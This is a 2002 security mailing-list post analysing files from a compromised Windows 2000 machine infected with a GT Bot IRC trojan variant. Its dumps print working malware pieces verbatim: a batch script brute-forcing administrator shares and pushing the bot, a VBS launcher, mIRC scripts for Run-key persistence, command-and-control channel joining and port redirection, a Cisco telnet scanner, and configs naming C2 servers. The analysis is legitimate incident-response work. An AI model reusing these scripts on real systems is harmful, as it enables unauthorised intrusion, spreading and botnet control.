W2K Compromise "Share Scan" - Infectx"IP Address".vbs

Patrick Nolan pnolan01 at nycap.rr.com
Wed Oct 9 15:15:55 GMT 2002


Hi folks, next is the original post reduced and resent to Unisog;

xxxxxxxxxxxxxxxxxxxxxxxxxx

Hello woofz,

Interesting posts, thanks for sending it. I downloaded http://lightning.prohosting.com/~woof/temp/wserver.zip , "the files found in a compromised Win2000 Pro. machine".

I submitted the files to SARC and 2 trojan detection vendors since they were not detected as a trojan by 2 scans I did which included current def's for variants of "IRC GTBot/Aristotles Trojan".

fwiw, I took a string look at the files, copied a bit more of interest to me next, tried to put some of the first few below in the order used. When I hear from the vendors I'll let you know what they say.

Regards,

Pat

\wserver\Winnt\system32\Infect217.121.100.126.vbs

00000000   00000000      0   on error resume next
00000016   00000016      0   Set fso = CreateObject("Scripting.FileSystemObject")
0000004C   0000004C      0   windows = fso.GetSpecialFolder(WindowsFolder)
0000007B   0000007B      0   Set src3 = CreateObject("Wscript.shell")
000000A5   000000A5      0   src3.run "share.bat 217.121.100.126",0,true

\wserver\Winnt\system32\share.bat
00000000   00000000      0   net use \\%1\C$ "" "/user:Administrator"
0000002A   0000002A      0   net use \\%1\C$ "administrator" "/user:Administrator"
00000061   00000061      0   net use \\%1\C$ "admin" "/user:Administrator"
00000090   00000090      0   net use \\%1\C$ "" "/user:Admin"
000000B2   000000B2      0   net use \\%1\C$ "admin" "/user:Admin"
000000D9   000000D9      0   net use \\%1\C$ "administrator" "/user:Admin"
00000108   00000108      0   md \\%1\C$\Drivers
0000011C   0000011C      0   copy iserver.bat \\%1\C$\Drivers
0000013E   0000013E      0   copy wserver.exe \\%1\C$\Drivers
00000160   00000160      0   ntcmd \\%1 -u:Administrator -p: < skill.vxd
0000018D   0000018D      0   ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
000001C7   000001C7      0   ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
000001F9   000001F9      0   ntcmd \\%1 -u:Admin -p: < skill.vxd
0000021E   0000021E      0   ntcmd \\%1 -u:Admin -p:admin < skill.vxd
00000248   00000248      0   ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
0000027A   0000027A      0   net use \\%1\C$ /del

\wserver\Winnt\system32\share.dat
**snip**
00000460   00000460      0       msg %chan Share Scan in Progress (Range) $longip(%NTServerScanCurrentIP) -> $longip(%NTServerScanEndIP)
**snip**
00000A8A   00000A8A      0       msg %chan Share Scan Complete (Range) $longip(%NTServerScanStartIp) -> $longip(%NTServerScanEndIp)
**snip**
00000CBA   00000CBA      0     msg %chan Share Scan Found (Amount) %skill
00000CE8   00000CE8      0     write Infect $+ $sock($sockname).ip $+ .vbs on error resume next
00000D2C   00000D2C      0     write Infect $+ $sock($sockname).ip $+ .vbs Set fso = CreateObject("Scripting.FileSystemObject")
00000D90   00000D90      0     write Infect $+ $sock($sockname).ip $+ .vbs windows = fso.GetSpecialFolder(WindowsFolder)
00000DED   00000DED      0     write Infect $+ $sock($sockname).ip $+ .vbs Set src3 = CreateObject("Wscript.shell")
00000E45   00000E45      0     write Infect $+ $sock($sockname).ip $+ .vbs src3.run "share.bat $sock($sockname).ip $+ ",0,true
00000EA8   00000EA8      0     timer 1 600 remove Infect $+ $sock($sockname).ip $+ .vbs
00000EE4   00000EE4      0     run Infect $+ $sock($sockname).ip $+ .vbs
00000F11   00000F11      0     sockclose $sockname

\wserver\Drivers\iserver.bat
00000000   00000000      0   net start systask

\wserver\Drivers\wserver.exe
**snip**
00043614   00443614      0   3Do you want to extract the files from this archive?
00043715   00443715      0   My Application
00043815   00443815      0   Please enter the password:
00043A14   00443A14      0   +The files have been installed successfully.
00043B14   00443B14      0   (Please wait while setup is installing...
00043C15   00443C15      0   %windowssystem%\aliases.ini
00043E14   00443E14      0   ;Please select a folder where you wish to install the files:
00044015   00444015      0   Setup
00044115   00444115      0   %windowssystem%\Explored.exe
00044415   00444415      0   %windowssystem%\
00044514   00444514      0   TPlease read the following License Agreement. Agree with YES or cancel Setup with NO.
00044615   00444615      0   GWA98
00044714   00444714      0   8Type or load a License Text here... (max. 2040 chars)
00045015   00445015      0   &Cancel
0004502E   0044502E      0    &Continue
0004507D   0044507D      0   uninstall.uni
000451A7   004451A7      0   %windowssystem%\aliases.ini
000452C6   004452C6      0   %windowssystem%\bnc.mrc
000453E5   004453E5      0   %windowssystem%\cscan.dat
00045504   00445504      0   %windowssystem%\download.ini
00045623   00445623      0   %windowssystem%\Explored.exe
00045742   00445742      0   %windowssystem%\ie6.dat
00045861   00445861      0   %windowssystem%\kernel33.exe
00045980   00445980      0   %windowssystem%\mirc.ini
00045A9F   00445A9F      0   %windowssystem%\moo.dll
00045BBE   00445BBE      0   %windowssystem%\remote.ini
00045CDD   00445CDD      0   %windowssystem%\webget.mrc
00045DFC   00445DFC      0   %windowssystem%\winboot.bin
00045F1B   00445F1B      0   %windowssystem%\wincfg
0004603A   0044603A      0   %windowssystem%\winconf.dat
00046159   00446159      0   %windowssystem%\winconf.mrc
00046272   00446272      0   temp exit files
000462A2   004462A2      0   %appfolder%\temp.exe
000462E2   004462E2      0   %appfolder%

\wserver\Winnt\system32\skill.vxd
00000000   00000000      0   c:\Drivers\wserver.exe

\wserver\Winnt\system32\aliases.ini

00000000   00000000      0   [aliases]
0000000B   0000000B      0   n0=recon server irc02.icq.com:6667 orderpass12
0000003B   0000003B      0   n1=b00t set 206.reg

\wserver\Winnt\system32\Explored.exe
too long to snip

\wserver\Winnt\system32\kernel33.exe.bak
**snips**
00004BFA   004905FA      0   FileVersion
00004C26   00490626      0   InternalName
00004C40   00490640      0   HideWindow
00004C5E   0049065E      0   LegalCopyright
00004C92   00490692      0    1996 Adrian Lopez; All rights reserved.
00004CEE   004906EE      0   OriginalFilename
00004D10   00490710      0   hidewndw.exe
00004D32   00490732      0   VarFileInfo
00004D52   00490752      0   Translation

\wserver\Winnt\system32\winconf.mrc
**snips**
00000000   00000000      0   on *:START:{
0000000E   0000000E      0     if ($exists(kernel33.exe) == $false) { /quit 
00000040   00000040      0   rror/Missing File ( $+ $ip $+ ) (hide.exe (hide not detected! quitting)) | /exit }
00000094   00000094      0     elseif ($exists(kernel33.exe) == $true) {
000000C1   000000C1      0       if ($appstate != hidden) { run kernel33.exe /c /fh mirc }
00000100   00000100      0       set %mircdir $replace($mircexe,\,\\)
0000012A   0000012A      0       set %filetoboot $rand(100,999) $+ .reg
00000156   00000156      0       write %filetoboot REGEDIT4
00000176   00000176      0       write %filetoboot [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
000001D0   000001D0      0       write %filetoboot $+("WinUpdate"=",%mircdir,")
00000204   00000204      0       .run -n regedit /s %filetoboot
00000228   00000228      0       .timer 1 4 remove %filetoboot
0000024B   0000024B      0       .timer 1 5 unset %filetoboot
0000026D   0000026D      0       .timer 1 6 unset %mircdir
0000028C   0000028C      0       .run kernel33.exe /c /fh mirc
000002AF   000002AF      0       .identd on $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
00000302   00000302      0       .server $readini(ie6.dat, start, server) $+ : $+ $readini(ie6.dat, start, serverport) $readini(ie6.dat, start, serverpass)
00000382   00000382      0       .nick Owned[ $+ $rand(0,99999) $+ ]
000003AB   000003AB      0       .fullname $rand(a,z) $+ $rand(a,z) $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(0,10000)
0000040E   0000040E      0       ;rv change
0000041E   0000041E      0       if ($hget(_systemtble)) hfree _systemtble
0000044D   0000044D      0       hadd -m _systemtble rec $+ $readini(ie6.dat, start, server) $true
00000494   00000494      0       hadd _systemtble $readini(ie6.dat, start, server) $true
000004D1   000004D1      0       ;rv change
000004E3   000004E3      0       if (%runonce == ON) && ($portfree(9000) == $false) { exit } 
00000525   00000525      0       if (%runonce == ON) && ($portfree(9000) == $true) { /socklisten blah 9000 }
00000580   00000580      0   on *:CONNECT:{
00000590   00000590      0     .mode $me +ix
000005A1   000005A1      0     .join $readini(ie6.dat, connect, chan) $readini(ie6.dat, connect, chankey)
000005F1   000005F1      0     ;rv change
000005FF   000005FF      0     hadd _systemtble rec $+ $server $false
0000062B   0000062B      0     if (!$hget(_systemtble,$server)) hadd _systemtble $server $true
0000066E   0000066E      0     ;rv change
00000681   00000681      0   on 1:DISCONNECT:{
00000694   00000694      0     ;rv change
000007E4   000007E4      0   on *:JOIN:*:{
000007F3   000007F3      0     ;rv change
00000801   00000801      0     hadd -m _systemtble rec $+ $server $null
0000082D   0000082D      0     ;rv change
0000083B   0000083B      0     if ($nick != $me) && (trial-irc !isin $nick) { whois $nick }
0000087B   0000087B      0     if ($chan == $readini(ie6.dat, connect, chan)) && ($nick == $me) {
000008C1   000008C1      0       .msg $chan 
000008D3   000008D3      0   Online: $host $+ / $+ $ip $fulldate $+ 
00000904   00000904      0   on *:text:.login*:*:{
0000091B   0000091B      0     if ($nick isop $chan) {
00000936   00000936      0       if (!$2) { halt }
0000094D   0000094D      0       if ($2 == $readini(winconf.dat, logins, $nick)) { 
00000985   00000985      0         echo -a in!
00000998   00000998      0         .msg $chan Login Accepted for ( $+ $nick $+ ).
000009CE   000009CE      0         .guser 10 $nick
000009E5   000009E5      0         else if ($level($address($nick,10)) != $Null) { .msg $chan $nick is already logged in. }
00000D92   00000D92      0   on 1:INPUT:*:/msg $readini(ie6.dat, connect, chan) WARNING: User Typing at Local Console - BOTNET EXE NOT HIDDEN!  - EXITING! %logo | exit
00000ED7   00000ED7      0     /msg $readini(ie6.dat, connect, chan) WARNING: Client Killed By Local User! %logo 
00000F3E   00000F3E      0   on 1:KEYDOWN:*:*:/msg $readini(ie6.dat, connect, chan) WARNING: User Typing at Local Console - BOTNET EXE NOT HIDDEN!  - EXITING! %logo | exit
00000FCE   00000FCE      0   on *:socklisten:gtportdirect*:{  set %gtsocknum 0 | :loop |  inc %gtsocknum 1 |  if $sock(gtin*,$calc($sock(gtin*,0) + %gtsocknum ) ) != $null { goto loop } |  set %gtdone $gettok($sockname,2,46) $+ . $+ $calc($sock(gtin*,0) + %gtsocknum ) | sockaccept gtin $+ . $+ %gtdone | sockopen gtout $+ . $+ %gtdone $gettok($sock($Sockname).mark,1,32) $gettok($sock($Sockname).mark,2,32) | unset %gtdone %gtsocknum }
00001167   00001167      0   on *:Sockread:gtin*: {  if ($sockerr > 0) return | :nextread | sockread [ %gtinfotem [ $+ [ $sockname ] ] ] | if [ %gtinfotem [ $+ [ $sockname ] ] ] = $null { return } | if $sock( [ gtout [ $+ [ $remove($sockname,gtin) ] ] ] ).status != active { inc %gtscatchnum 1 | set %gtempr $+ $right($sockname,$calc($len($sockname) - 4) ) $+ %gtscatchnum [ %gtinfotem [ $+ [ $sockname ] ] ] | return } | sockwrite -n [ gtout [ $+ [ $remove($sockname,gtin) ] ] ] [ %gtinfotem [ $+ [ $sockname ] ] ] | unset [ %gtinfotem [ $+ [ $sockname ] ] ] | if ($sockbr == 0) return | goto nextread } 
000013A9   000013A9      0   on *:Sockread:gtout*: {  if ($sockerr > 0) return | :nextread | sockread [ %gtouttemp [ $+ [ $sockname ] ] ] |  if [ %gtouttemp [ $+ [ $sockname ] ] ] = $null { return } | sockwrite -n [ gtin [ $+ [ $remove($sockname,gtout) ] ] ] [ %gtouttemp [ $+ [ $sockname ] ] ] | unset [ %gtouttemp [ $+ [ $sockname ] ] ] | if ($sockbr == 0) return | goto nextread } 
0000150E   0000150E      0   on *:Sockopen:gtout*: {  if ($sockerr > 0) return | set %gttempvar 0 | :stupidloop | inc %gttempvar 1 | if %gtempr  [ $+ [ $right($sockname,$calc($len($sockname) - 5) ) ] $+ [ %gttempvar ] ] != $null { sockwrite -n $sockname %gtempr [ $+ [ $right($sockname,$calc($len($sockname) - 5) ) ] $+ [ %gttempvar  ] ] |  goto stupidloop  } | else { unset %gtempr | unset %gtscatchnum | unset %gtempr* } }
0000169B   0000169B      0   on *:sockclose:gtout*: { unset %gtempr* | sockclose gtin $+ $right($sockname,$calc($len($sockname) - 5) ) | unset %gtscatchnum | sockclose $sockname }
00001733   00001733      0   on *:sockclose:gtin*: {   unset %gtempr* | sockclose gtout $+ $right($sockname,$calc($len($sockname) - 4) ) | unset %gtscatchnum  | sockclose $sockname }
000017CE   000017CE      0   alias predirectstats { set %gtpcount 0 | :startloophere | inc %gtpcount 1 |  if $sock(gtportdirect*,%gtpcount) != $null { /msg $chan Local Host/Port: /server $ip $+ : $+ $gettok($sock(gtportdirect*,%gtpcount),2,46) Remote Host/Port: $gettok($sock(gtportdirect*,%gtpcount).mark,1,32) $+ : $+ $gettok($sock(gtportdirect*,%gtpcount).mark,2,32)  | goto startloophere  } | else { if %gtpcount = 1 { //msg $chan No port redirects added! } | //msg $chan [End of Redirectional Status List] | unset %gtpcount } }
000019C7   000019C7      0   alias pdirectstop { Set %gtrdstoppnum $1 | sockclose [ gtportdirect. [ $+ [ %gtrdstoppnum ] ] ]  | sockclose [ gtin. [ $+ [ %gtrdstoppnum ] ] ] $+ *  | sockclose [ gtout. [ $+ [ %gtrdstoppnum ] ] ] $+ *  | unset %gtrdstoppnum } 
00001AAD   00001AAD      0   alias gtportdirect { if $3 = $null { return } | socklisten gtportdirect $+ . $+ $1 $1 | sockmark gtportdirect $+ . $+ $1 $2 $3 }
00001B33   00001B33      0   ctcp &*:*:{ 
00001B41   00001B41      0     .NOTICE $nick microb0t by microtech 
00001B6C   00001B6C      0   on 10:text:*:*:{

\wserver\Winnt\system32\mirc.ini
00000000   00000000      0   [text]
00000008   00000008      0   commandchar=/
00000017   00000017      0   linesep=-
00000022   00000022      0   timestamp=[HH:nn]
00000035   00000035      0   accept=*.bmp,*.gif,*.jpg,*.log,*.mid,*.mp3,*.ogg,*.png,*.txt,*.wav,*.wma,*.zip
00000085   00000085      0   network=All
00000092   00000092      0   ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
000000F3   000000F3      0   [warn]
000000FB   000000FB      0   fserve=off
00000107   00000107      0   dcc=off
00000110   00000110      0   [options]
0000011B   0000011B      0   n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,1,0,2,0,0,4096,0,1,0,0,0,0,1,0,50,0,1
00000165   00000165      0   n1=5,100,0,0,0,0,0,0,3,1,1,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
000001AD   000001AD      0   n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
000001FA   000001FA      0   n3=5000,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,0,1,1,3,17,0,0,0,3,180
00000246   00000246      0   n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,9999,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
0000029B   0000029B      0   n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,0,26,0,0,0,8192,1,0,0,82
000002EB   000002EB      0   n6=0,0,11,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,100,1,1,0,0,1,0,0,4,1,0
00000334   00000334      0   n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,0,1,1,1,1,0,0,0,0,1,1,0
0000037B   0000037B      0   [about]
00000384   00000384      0   version=6.01
00000392   00000392      0   show=BR26354
000003A0   000003A0      0   [dirs]
000003A8   000003A8      0   [pfiles]
000003B2   000003B2      0   n0=popups.ini
000003C1   000003C1      0   n1=popups.ini
000003D0   000003D0      0   n2=popups.ini
000003DF   000003DF      0   n3=popups.ini
000003EE   000003EE      0   n4=popups.ini
000003FD   000003FD      0   [files]
00000406   00000406      0   servers=servers.ini
0000041B   0000041B      0   browser=C:\Program Files\Internet Explorer\iexplore.exe
00000454   00000454      0   emailer=C:\Program Files\Outlook Express\msimn.exe
00000488   00000488      0   finger=finger.txt
0000049B   0000049B      0   urls=urls.ini
000004AA   000004AA      0   addrbk=addrbk.ini
000004BD   000004BD      0   [windows]
000004C8   000004C8      0   scripts=29,985,-7,703,0,0,0
000004E5   000004E5      0   main=0,112,0,27,2,1,0
000004FC   000004FC      0   wchannel=0,532,0,347,0,1,0
00000518   00000518      0   wserv=0,563,0,409,1,1,0
00000531   00000531      0   wdccs=-1,269,-1,271,0,1,0
0000054C   0000054C      0   wquery=84,563,84,409,1,1,0
00000568   00000568      0   wdccg=-1,269,-1,271,0,1,0
00000583   00000583      0   [ports]
0000058C   0000058C      0   random=off
00000598   00000598      0   bind=off
000005A2   000005A2      0   [ident]
000005AB   000005AB      0   active=yes
000005B7   000005B7      0   userid=uicdk
000005C5   000005C5      0   system=UNIX
000005D2   000005D2      0   port=113
000005DC   000005DC      0   [socks]
000005E5   000005E5      0   enabled=no
000005F1   000005F1      0   port=1080
000005FC   000005FC      0   method=4
00000606   00000606      0   dccs=no
0000060F   0000060F      0   useip=yes
0000061A   0000061A      0   [language]
**snip**

\wserver\Winnt\system32\cscan.dat
00000000   00000000      0   on 10:text:.ciscoscan*:*:{  
0000001E   0000001E      0     if ($2 == start) {
00000034   00000034      0       if ($4 == $null) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
00000080   00000080      0       if ($3 < 167772160) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
000000CF   000000CF      0       if ($4 < 167772160) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
0000011E   0000011E      0       if ($3 > 4294967294) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
0000016E   0000016E      0       if ($4 > 4294967294) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
000001BE   000001BE      0       if ($5 != $me) { halt }
000001DB   000001DB      0       else {
000001E7   000001E7      0         .set %range0 $3
000001FE   000001FE      0         .set %range1 $3
00000215   00000215      0         .set %range2 $4
0000022C   0000022C      0         .set %chan $chan
00000244   00000244      0         .timerc1 0 2 /range1
00000260   00000260      0         .timerc2 0 2 /range1
0000027C   0000027C      0         .timerc3 0 2 /range1
00000298   00000298      0         .timerc4 0 2 /range1
000002B4   000002B4      0         .timerc5 0 2 /range1
000002D0   000002D0      0         .msg $chan Started scanning $longip($3) -> $longip($4)
0000030E   0000030E      0       }
0000031A   0000031A      0     if ($2 == stop) { .timerc* off | .sockclose c* | .msg $chan [ciscoscan] Stopped scan of $longip(%range0) -> $longip(%range2) on $longip(%range1) }
000003B0   000003B0      0     if ($2 == status) { if ($timer(c1) == $null) { .msg $readini(ie6.dat, connect, chan) [ciscoscan] Not running | .halt } | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Currently scanning: $longip(%range0) -> $longip(%range2) Currently on: $longip(%range1) }
000004B8   000004B8      0     if ($2 == send) { .var %file $ip $+ $rand(1,999) $+ .txt | .copy ciscos.txt %file | .timerdccsend 1 2 /dcc send $nick %file | .timerdccremove 1 120 /remove %file | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Now sending %file to $nick $+ ... }
000005B8   000005B8      0   on 1:sockread:c*:{
000005CC   000005CC      0     if ($sockerr > 0) return
000005E8   000005E8      0     :nextread
000005F5   000005F5      0     sockread %temp
00000607   00000607      0     if ($sockbr == 0) return
00000623   00000623      0     if (%temp == $null) %temp = -
00000644   00000644      0     if (*User*Access*Verification* iswm %temp) { .write ciscos.txt $sock($sockname).ip | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Found cisco! Total ciscos on this machine: $lines(ciscos.txt) }
0000070E   0000070E      0     goto nextread
00000722   00000722      0   Alias range1 { /sockopen c $+ $rand(100000,999999) $range 23 }
00000762   00000762      0   Alias range {
00000771   00000771      0     if (%range1 == %range2) { .sockclose c* | .timerc* off | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Finished scan of $longip(%range0) -> $longip(%range2) }
00000817   00000817      0     else { .inc %range1 | .return $longip(%range1) }

\wserver\Winnt\system32\ie6.dat
00000000   00000000      0   [start]
00000009   00000009      0   server=itg.kicks-ass.net
00000023   00000023      0   server2=itg.kicks-ass.org
0000003E   0000003E      0   serverport=6667
0000004F   0000004F      0   serverpass=nopass
00000062   00000062      0   server2port=6667
00000074   00000074      0   server2pass=nopass
0000008A   0000008A      0   [connect]
00000095   00000095      0   chan=#imaowned
000000A5   000000A5      0   chan2=#imaowned
000000B6   000000B6      0   chankey=0wn3d
000000C5   000000C5      0   chan2key=0wn3d

\wserver\Winnt\system32\remote.ini

00000000   00000000      0   [users]
00000009   00000009      0   n0=50:Mohra-Demon!*smsjy at unknown.cable.wanadoo.nl
0000003E   0000003E      0   [variables]
0000004B   0000004B      0   n0=%gttempvar 1
0000005C   0000005C      0   n1=%gtsocknum 1
0000006D   0000006D      0   n2=%gtdone 777.502
00000081   00000081      0   n3=%packetsentrecord 0
00000099   00000099      0   n4=%streamedrecord 0
000000AF   000000AF      0   n5=%flserv twisted.ma.us.dal.net
000000D1   000000D1      0   n6=%flport 6667
000000E2   000000E2      0   n7=%flchan #externet
000000F8   000000F8      0   n8=%loadscript on
0000010B   0000010B      0   n9=%run on
00000117   00000117      0   n10=%w.g.# #microb0ts
0000012E   0000012E      0   n11=%dlpage www.cube-hacking.net
00000150   00000150      0   n12=%dlfile /lists/proxies.txt
00000170   00000170      0   n13=%chan #!#fifa
00000183   00000183      0   n14=%range0 2897543168
0000019B   0000019B      0   n15=%range1 2897543241
000001B3   000001B3      0   n16=%range2 2897608703
000001CB   000001CB      0   n17=%i 2718
000001D8   000001D8      0   n18=%wget.9069 www.freeserve.com
000001FA   000001FA      0   n19=%wget.9069.write no
00000213   00000213      0   n20=%wget.9069.file www.freeserve.com
0000023A   0000023A      0   n21=%trans.dl
00000249   00000249      0   n22=%runonce on
0000025A   0000025A      0   n23=%fnet tiscali.dal.net
00000275   00000275      0   n24=%fport 6661
00000286   00000286      0   n25=%fchan #roadkill
0000029C   0000029C      0   n26=%NTServerScanStartIp 4225761280
000002C1   000002C1      0   n27=%NTServerScanCurrentIp 4225787922
000002E8   000002E8      0   n28=%NTServerScanEndIp 4225826815
0000030B   0000030B      0   n29=%mircdir C:\\WINNT\\System32\\Explored.exe
0000033B   0000033B      0   n30=%filetoboot 361.reg

\wserver\Winnt\system32\download.ini
00000000   00000000      0   n0=on *:sockopen:range.*:{ if ($sock($sockname).status == 
**rest snipoped for Unisog size limit**

----- Original Message ----- 
From: <woofz at gmx.net>
To: <incidents at securityfocus.com>
Sent: Tuesday, October 08, 2002 7:40 PM
Subject: Re: W2K Compromise - PipeCmdSrv


> In-Reply-To: <20021008001826.2454.qmail at mail.securityfocus.com>
> 
> Finally found that my payload is related to IRC GTBot/Aristotles Trojan 
> horse virus , a GT Bot Aurora.d variant i guess ,that come with the same 
> explored.exe file.
> 
> More info @ http://golcor.tripod.com/gtbot.htm & i have alerted the author 
> there on our message thread here.
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
>



More information about the unisog mailing list